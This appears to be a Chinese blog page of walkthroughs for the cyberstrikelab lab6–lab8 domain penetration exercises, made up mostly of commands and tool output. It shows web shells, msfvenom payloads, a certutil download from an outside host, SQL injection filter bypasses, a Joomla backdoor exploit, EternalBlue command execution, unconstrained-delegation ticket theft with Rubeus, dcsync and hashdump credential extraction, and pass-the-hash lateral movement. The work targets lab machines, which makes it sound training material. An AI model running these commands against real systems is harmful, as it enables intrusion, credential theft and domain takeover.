WebTitle http://10.5.5.33:5985 code:404 len:315 title:Not Found 已完成 4/5 [-] (58/210) rdp 10.5.5.33:3389 administrator Aa123456 remote error: tls: access denied 已完成 4/5 [-] (118/210) rdp 10.5.5.33:3389 admin abc123456 remote error: tls: access denied 已完成 4/5 [-] (178/210) rdp 10.5.5.33:3389 guest 666666 remote error: tls: access denied 已完成 5/5 [*] 扫描结束,耗时: 3m59.4511788s 扫到3389端口,试试能不能爆破出密码,admin@123456把目录传进去,要把马传进去proxychAIns rdesktop 10.5.5.33 -r disk:shell=/data/demo 传shellmsf开启监听,上线use exploit/multi/handler set PAYLOAD windows/meterpreter/bind_tcp set RHOST 10.5.5.33 set LPORT 4444 非约束委派相关文章学习连接:https://forum.butian.net/share/1591可能是环境出问题了(排除版本问题,我切换了多个AdFind版本),一直凭据出错,不能正常执行命令,拿到了33的系统权限也是一样,添加管理员账户执行AdFind照样错误,下面图来自网上这里的图来自 https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab8/# ADFind查询非约束委派账户 AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn # 使用Rubeus监听来自域控的票据 Rubeus.exe monitor /interval:2 /filteruser:DC$ 利用打印机漏洞(SpoolSample)或类似攻击让域控主动连接非约束委派机器,从而生成并发送Kerberos票据给攻击者控制机器。# 强制回连,获得域控机器账户的TGT shell SpoolSample.exe DC CYBERWEB # rubeus导入票据 Rubeus.exe ptt /ticket:doIFtDCCBbCgAwIBBaEDAgEWooIErDCCBKhhggSkMIIEoKADAgEFoRQbEkNZQkVSU1RSSUtFTEFCLkNPTAInMCWgAwIBAqEeMBwbBmtyYnRndBsSQ1lCRVJTVFJJS0VMQUIuQ09No4IEWDCCBFSgAwIBEqEDAgECooIERgSCBELeAgo8gfc1sOmVFHxh23jlld/MeJN/NEYNWOVmXG7H6J6jeQH/ux0qR9NhB8XEHpISi/k+m+d3MgVV9I97HPHPGpxMwwPwn283E5+JQBdhYK/Vq7eQhQScpw0+uojOX8Clvw/YjIv8V1G1Kqxyj+EbWm07KVjefQHMeuclOII27ZclrWuVxNQ1GI2GV+nLVrRMgGlKmh9FTnLKacg3lGZutWuUS1pU3OWc7Q0wClL6MeczUq378IMB3G4Vv3cAR8mY/niULKswPfzVbe6oeuvAIOpHHV6qoB631NiF48twHG78uZ+ExiVIU9p1juR7IL053H0LOSRTV/behPNz8c/mhcxCWDfXVEAn1gbibwUvrBSCiNP6hp234Qa4pbEB8PTlxXc0QYxQVF8VC+btIxx93APc+/W6wBzxPr65IIqlhlbV1NdUCIF2SGqliyHUdOIRF9llx52RaTsYhzX4D5Hsqoh8YLIs52q7o9gy6yyJi69qADD4jpmvC6exzl0l40qd+csY8vfb2Ojm5fwgNn1oDLWRxjPriEGQNSFIxBuDF4BD3lzWcQFbTsuBYl0a7NBXeFHFWwnDRoQrdO6UHSDcpJt0WRvo+8S+sr14PvTITr6BWeKafeBy/Ve+iovAFCZo7DbAUISpPxYdpIjUzIpfm7ZMLT015MGNYB16PhNvUL3tfavikHed87lgfvTs429bSOcYP1U1YnT8/z2TrIMuuKpvjyNq9cZmZeLsS9SnNCwiFartRSephd587X5ERqsg0AI/i87lWJCBCQ15a9LapH5vxYvnkHljhvT3/5Vo9RYfGiJbdEtxG1vR17LsGCV05ROpf8L0Fa0CdWXB84MSzXjoIySIRV9zAvvcsTfu+r6oTT7QL9ciG8FvaHY2Gtf32FlFOfVLdoy1B63d0nYoKoZmm09ImIFFjKV0871uhQ3po3nu1vVvJkiRHM7hVwhK9h9aHTtYahuig1z6oxqYVMsubnYlrUKIPKe6O/qTBSaJoH03cXnWYUxrObv5A5ekiIG6zuHsqmGaDXWZV/5SfB4DaztwJZHzvYwuCYsSR6IV2vWW4st9ONoWkzg08XXjvVoEqfqlpTs2WjxAPaK1kY8oIp7SHJ7DVovFnkf7puFHGbJ/wBCpdR61Pl1qj/ntuv1OVdRRb71DfTZHjmV4rXISZ3cjwAJTgKqlIUzzrkiTsmTrtk92z3eIfm9EE4NqkOJWmxd9sXhC58W4CVFnZXZ7A4BqiBctRX/ZMXLcz++55SqSLTg8Xbm01EXTVnQHU6XTdOPs+4ZRrXEo+r8I+hT0aQegwcDCCt1WseFh92ut06Y1zfyNcxcffBZPB3UA0Te49BxN493RdwbUw4RIObPUoucAW4r7i0p6Nk0MxXt+nnYHuKesYu+GhOStENyVjmbIcSLqd4cJNrBAX3cNZmCtSFGSuKahub4Lb7k0WoRZo4HzMIHwoAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagKzApoAMCARKhIgQgo+1mN3aSVBbGT0Sp9kwHxXFCpO+xUDGciGtbd189KomhFBsSQ1lCRVJTVFJJS0VMQUIuQ09NohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMjUwNTI1MDUwNDQwWqYRGA8yMDI1MDUyNTE1MDQ0MFqnERgPMjAyNTA2MDEwNTA0NDBaqBQbEkNZQkVSU1RSSUtFTEFCLkNPTaknMCWgAwIBAqEeMBwbBmtyYnRndBsSQ1lCRVJTVFJJS0VMQUIuQ09N # mimikatz导出域内用户Hash mimikatz.exe "lsadump::dcsync /domAIn:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit" # PTH proxychAIns impacket-psexec -hashes :9d880175be3fc0e75ebb9686f482cfa5 cyberstrike.com/administrator@10.5.5.66 相关解释AdFind.exe这是一款免费的命令行工具,用于在AD域中执行查询域内信息,AD对象,LDAP协议交互情况,域内权限分析,以及域环境侦察,例如# 查询域中所有用户 AdFind.exe -f "(objectcategory=person)" dn # 查询不要求Kerberos预身份认证的用户(用于安全审计) AdFind.exe -b "dc=example,dc=com" -f "(&(samaccounttype=805306369)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" # 获取域控制器信息 AdFind.exe -d domAIn.com -u username -p password -b "dc=domAIn,dc=com" -s base objectClass 详细的使用可以参考官方手册,百度一下,你就知道
2025年12月13日
740 阅读
0 评论
0 点赞
2025-12-13
【域渗透】cyberstrikelab-lab7
cyberstrikelab-lab7web渗透9652端口八哥CMSPS C:\Users\xt350> fscan.exe -h 192.168.10.10 -p 1-65000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 192.168.10.10:139 open 192.168.10.10:135 open 192.168.10.10:445 open 192.168.10.10:3306 open 192.168.10.10:5040 open 192.168.10.10:7680 open 192.168.10.10:9652 open 192.168.10.10:49664 open 192.168.10.10:49666 open 192.168.10.10:49665 open 192.168.10.10:49669 open 192.168.10.10:49668 open 192.168.10.10:49667 open 192.168.10.10:49670 open [*] alive ports len is: 14 start vulscan [*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:网站标题-网站标题 - Powered By BageCMS 已完成 14/14 [*] 扫描结束,耗时: 4m16.0065058s http://192.168.10.10:9652/install.txt这个地址泄露了后台管理地址,使用admin / admin123456弱口令登录后台,发现cms版本为 BageCMS3.1.0修改网站首页源码<?php @eval($_POST['a']);?> 生成msf马,执行,监听上线msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" 内网渗透C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::8c17:fbcc:901f:c897%6 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::fd48:8021:9701:9c1d%14 IPv4 Address. . . . . . . . . . . : 192.168.20.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.10/24 fscan.exe -h 192.168.20.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.10 is alive (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.40 is alive [*] Icmp alive hosts len is: 3 192.168.20.20:445 open 192.168.20.10:445 open 192.168.20.10:7680 open 192.168.20.40:88 open 192.168.20.20:3306 open 192.168.20.10:3306 open 192.168.20.40:445 open 192.168.20.40:139 open 192.168.20.20:139 open 192.168.20.10:139 open 192.168.20.40:135 open 192.168.20.20:135 open 192.168.20.10:135 open [*] alive ports len is: 13 start vulscan [+] NetInfo: [*]192.168.20.40 [->]WIN-137FCI4D99A [->]192.168.20.40 [+] NetInfo: [*]192.168.20.20 [->]cyberweb [->]192.168.20.20 [+] 192.168.20.40 MS17-010 (Windows Server 2016 Standard 14393) [*] 192.168.20.40 [+]DC cyberstrikelab\WIN-137FCI4D99A Windows Server 2016 Standard 14393 [*] 192.168.20.20 cyberstrikelab\CYBERWEB Windows Server 2012 R2 Standard 9600 已完成 13/13 [*] 扫描结束,耗时: 14.733617s 域控主机为20.40,存在永恒之蓝漏洞,使用msf命令执行,获取第二个flaguse admin/smb/ms17_010_command set command type c:\\flag.txt set rhosts 192.168.20.40 run 配置路由run post/multi/manage/autoroute 使用代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 本机使用proxifier代理到kali msf的ip地址和端口开启本地资源共享远程连接传入msf正向马msf设置好配置,准备上线利用永恒之蓝执行木马(我们远程登录的是普通用户,不是系统权限,抓取不了hash),需要利用永恒之蓝来执行木马msf auxiliary(admin/smb/ms17_010_command) > set command C:\\Users\\xiaoyu\\Desktop\\shell.exe command => C:\Users\xiaoyu\Desktop\shell.exe msf auxiliary(admin/smb/ms17_010_command) > run [*] 192.168.20.40:445 - Target OS: Windows Server 2016 Standard 14393 [*] 192.168.20.40:445 - Built a write-what-where primitive... [+] 192.168.20.40:445 - Overwrite complete... SYSTEM session obtained! [+] 192.168.20.40:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.20.40:445 - Getting the command output... [*] 192.168.20.40:445 - Command finished with no output [*] 192.168.20.40:445 - Executing cleanup... [+] 192.168.20.40:445 - Cleanup was successful [+] 192.168.20.40:445 - Command completed successfully! [*] 192.168.20.40:445 - Output for "C:\Users\xiaoyu\Desktop\shell.exe": [*] 192.168.20.40:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 因为使用的是正向连接,执行之后再来连接shellmsf auxiliary(admin/smb/ms17_010_command) > use exploit/multi/handler [*] Using configured payload windows/meterpreter/bind_tcp msf exploit(multi/handler) > show options Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST 192.168.20.40 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target View the full module info with the info, or info -d command. msf exploit(multi/handler) > run -j [*] Exploit running as background job 5. [*] Exploit completed, but no session was created. [*] Started bind TCP handler against 192.168.20.40:4444 msf exploit(multi/handler) > [*] Sending stage (177734 bytes) to 192.168.20.40 [*] Meterpreter session 4 opened (192.168.20.10:50929 -> 192.168.20.40:4444 via session 3) at 2025-12-11 02:21:05 -0500 msf exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-JFB 10.10.10.173:36245 -> 192.168.10.1 57A8 0:4444 (192.168.10.10) 4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-137FCI4 192.168.20.10:50929 -> 192.168.20. D99A 40:4444 via session 3 (192.168.20. 40) msf exploit(multi/handler) > sessions 4 [*] Starting interaction with 4... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 利用msf的hashdump,获取域控主机的管理员hashmeterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05::: xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd::: WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd::: CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904::: PTH 20,拿下最后一台机器proxychains impacket-psexec -hashes :d8174fc8c5ee7a8e460df2e61d00bd3c cyberstrikelab.com/Administrator@192.168.20.20
2025年12月13日
859 阅读
0 评论
0 点赞
2025-12-13
【域渗透】cyberstrikelab-lab6
cyberstrikelab-lab6第一台目录扫描到administrator后台地址apt install joomscan joomscan -u http://192.168.10.10/ # 扫出结果Joomla版本3.4.6 [+] Detecting Joomla Version [++] Joomla 3.4.6 exp获取searchsploit Joomla 3.4.6 searchsploit -m 47524 使用┌──(root㉿kali)-[/data/demo] └─# python 47465.py -t http://192.168.10.10/ -e [*] Getting Session Cookie .. [*] Getting CSRF Token .. [*] Sending request .. [+] Vulnerable [*] Getting Session Cookie .. [*] Getting CSRF Token .. [*] Sending request .. [+] Backdoor implanted, eval your code at http://192.168.10.10//configuration.php in a POST with khacpsczesvgcaeqwadfazwmljdlcqqrkqezpuyedrwcsfjqqm [*] Now it's time to reverse, trying with a system + perl 得到密码khacpsczesvgcaeqwadfazwmljdlcqqrkqezpuyedrwcsfjqqm蚁剑连接生成马,蚁剑上传msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe kalimsfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" 获取正向shell,蚁剑执行exeshell.exe 得到第一台机器shell这台机器没有第二章网卡C:\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::71b1:e5e:d78d:3036%7 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Tunnel adapter isatap.{99805FC6-03F4-4415-8F77-D4C935988DCA}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\WWW>fscan.exe -h 192.168.10.10/24 fscan.exe -h 192.168.10.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.10.10 is alive (icmp) Target 192.168.10.20 is alive (icmp) Target 192.168.10.233 is alive [*] Icmp alive hosts len is: 3 192.168.10.233:8080 open 192.168.10.20:7001 open 192.168.10.10:3306 open 192.168.10.20:445 open 192.168.10.10:445 open 192.168.10.20:139 open 192.168.10.10:139 open 192.168.10.20:135 open 192.168.10.10:135 open 192.168.10.10:80 open 192.168.10.233:22 open [*] alive ports len is: 11 start vulscan [+] NetInfo: [*]192.168.10.10 [->]WIN-P5ECGG92B08 [->]192.168.10.10 [*] 192.168.10.20 cyberstrikelab\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:https://192.168.10.233:8080 code:404 len:19 title:None [*] WebTitle:http://192.168.10.10 code:200 len:6060 title:Home [*] WebTitle:http://192.168.10.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.10.20:7001 [weblogic] 已完成 10/11 [-] ssh 192.168.10.233:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 root system ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 admin admin#123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 admin a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 11/11 [*] 扫描结束,耗时: 4m39.975774s 第二台fscan扫描出来的192.168.10.20:7001 weblogic第二个flag第三台传马上线msf,msf注意修改ip,因为我们是正向连接certutil -urlcache -split -f http://172.16.233.2:8000/shell.exe shell.exe 上传fscanupload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 发现另外一张网卡C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫�� 3: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::e9e1:6372:ae05:ecf0%17 IPv4 Address. . . . . . . . . . . : 192.168.10.20 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::3d2f:f957:5cf8:220f%16 IPv4 Address. . . . . . . . . . . : 192.168.20.20 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 Tunnel adapter isatap.{1342B97A-CC27-446C-9089-7A3F3210BB09}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{56056A50-6E34-40E7-805D-8B35838D77D9}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : 扫另外一张网卡,发现第三台主机30C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>fscan.exe -h 192.168.20.20 fscan.exe -h 192.168.20.20 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.20 is alive [*] Icmp alive hosts len is: 1 192.168.20.20:7001 open 192.168.20.20:445 open 192.168.20.20:139 open 192.168.20.20:135 open [*] alive ports len is: 4 start vulscan [*] 192.168.20.20 cyberstrikelab\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.20.20:7001 [weblogic] [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2019-2725 v12 已完成 4/4 [*] 扫描结束,耗时: 9.7411266s C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>fscan.exe -h 192.168.20.20/24 fscan.exe -h 192.168.20.20/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.30 is alive [*] Icmp alive hosts len is: 2 192.168.20.30:88 open 192.168.20.20:7001 open 192.168.20.30:445 open 192.168.20.20:445 open 192.168.20.30:139 open 192.168.20.20:139 open 192.168.20.30:135 open 192.168.20.20:135 open 192.168.20.30:80 open [*] alive ports len is: 9 start vulscan [*] 192.168.20.20 cyberstrikelab\CYBERWEB Windows Server 2012 R2 Standard 9600 [+] NetInfo: [*]192.168.20.30 [->]WIN-9DJ4TH21IE9 [->]192.168.20.30 [+] 192.168.20.30 MS17-010 (Windows Server 2016 Standard 14393) [*] 192.168.20.30 [+]DC cyberstrikelab\WIN-9DJ4TH21IE9 Windows Server 2016 Standard 14393 [*] WebTitle:http://192.168.20.30 code:200 len:703 title:IIS Windows Server [+] http://192.168.20.30 poc-yaml-active-directory-certsrv-detect [*] WebTitle:http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.20.20:7001 [weblogic] [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2020-14750 [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2019-2725 v12 已完成 9/9 [*] 扫描结束,耗时: 17.9561302s 发现ms17-010漏洞,使用命令执行得到最后一个flaggo-flag{kqqjRIRRoiJO5JIm}
2025年12月13日
863 阅读
0 评论
0 点赞
2025-12-13
【域渗透】cyberstrikelab-lab5
cyberstrikelab-lab5web渗透BEESCMS1、后台发现验证码复用漏洞,后台账号密码可以爆破2、后台sql注入漏洞admin' order by 5--+ # and 被过滤 admin' and updatexml(1,concat(0x7e,select database(),0x7e),1)--+ # 去掉前面的空格 admin'and updatexml(1,concat(0x7e,select database(),0x7e),1)--+ # 报错信息如下,数据库名beescms 操作数据库失败XPATH syntax error: '~,beescms~'<br>sql:select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='admin'and updatexml(1,concat(0x7e, database(),0x7e),1)-- ' limit 0,1 # 其他双写绕过 union => uni union on select => selselectect from => fr from om where => wh where ere # 列1 admin_name admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e),1)# # 列2 admin_password admin'a and nd updatexml(1,concat(0x7e,(seselectlect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 2,1),0x7e),1)# # 字段1 admin admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_name fr from om beescms.bees_admin limit 0,1),0x7e),1)# # 字段2 7e60bc642fefc11b43792e8745df6c1 // cmd5.com 解密 cyber admin'a and nd updatexml(1,concat(0x7e,(seselectlect admin_password fr from om beescms.bees_admin limit 0,1),0x7e),1)# 密码cyber,登录,版本就是4.0准备一个图片马,shell.jpg,抓包修改shell.php<?php @eval($_POST['shell']); ?> 在上传图片管理界面,查看网页源码,找到新上传图片的html标签能看到php文件路径,然后蚁剑连接http://192.168.10.10:6582/upload/img/202512101423498303.php 内网渗透msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe upload /data/windows_atk/mimikatz/x64/x64/mimikatz.exe fscan扫内网,在20.20的8080端口,有一个Jboss内容管理系统C:\phpstudy_pro\WWW\upload\img>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::d4eb:d150:7852:d93f%8 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 0 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::f90f:239c:ae8a:42db%15 IPv4 Address. . . . . . . . . . . : 192.168.20.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 C:\phpstudy_pro\WWW\upload\img>fscan.exe -h 192.168.20.0/24 fscan.exe -h 192.168.20.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.10 is alive (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.30 is alive [*] Icmp alive hosts len is: 3 192.168.20.10:445 open 192.168.20.20:139 open 192.168.20.20:135 open 192.168.20.30:88 open 192.168.20.20:8080 open 192.168.20.10:3306 open 192.168.20.30:445 open 192.168.20.20:445 open 192.168.20.30:139 open 192.168.20.10:139 open 192.168.20.30:135 open 192.168.20.10:135 open 192.168.20.20:8009 open 192.168.20.10:7680 open [*] alive ports len is: 14 start vulscan [+] NetInfo: [*]192.168.20.20 [->]cyberweb [->]192.168.20.20 [+] NetInfo: [*]192.168.20.30 [->]WIN-7NRTJO59O7N [->]192.168.20.30 [*] 192.168.20.30 [+]DC __MSBROWSE__\WIN-7NRTJO59O7N [*] 192.168.20.20 cyberstrikelab\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:http://192.168.20.20:8080 code:200 len:1554 title:Welcome to JBoss AS [+] InfoScan:http://192.168.20.20:8080 [Jboss] 已完成 14/14 [*] 扫描结束,耗时: 18.7052044s 设置路由,配置代理meterpreter > run post/multi/manage/autoroute [*] Running module against DESKTOP-JFB57A8 (192.168.10.10) [*] Searching for subnets to autoroute. [+] Route added to subnet 192.168.10.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.20.0/255.255.255.0 from host's routing table. meterpreter > bg [*] Backgrounding session 1... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf auxiliary(server/socks_proxy) > set SRVPORT 1080 SRVPORT => 1080 msf auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server 设置proxychains4配置文件,代理到msf┌──(root㉿kali)-[/data/demo] └─# tail /etc/proxychains4.conf # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # rted: "basic"-http "user/pass"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 获取到对方内网的 Jboss cms这个可以利用jboss综合利用工具,获取到第二个flag第三台,永恒之蓝命令执行,反弹shell和其他的都不行use auxiliary/admin/smb/ms17_010_command set RHOSTS 192.168.20.30 set COMMAND type C:\\flag.txt run 最后得到flaggo-flag{Cfg8hlBj4dXppo5j}
2025年12月13日
876 阅读
0 评论
0 点赞
1
...
5
6
7
...
37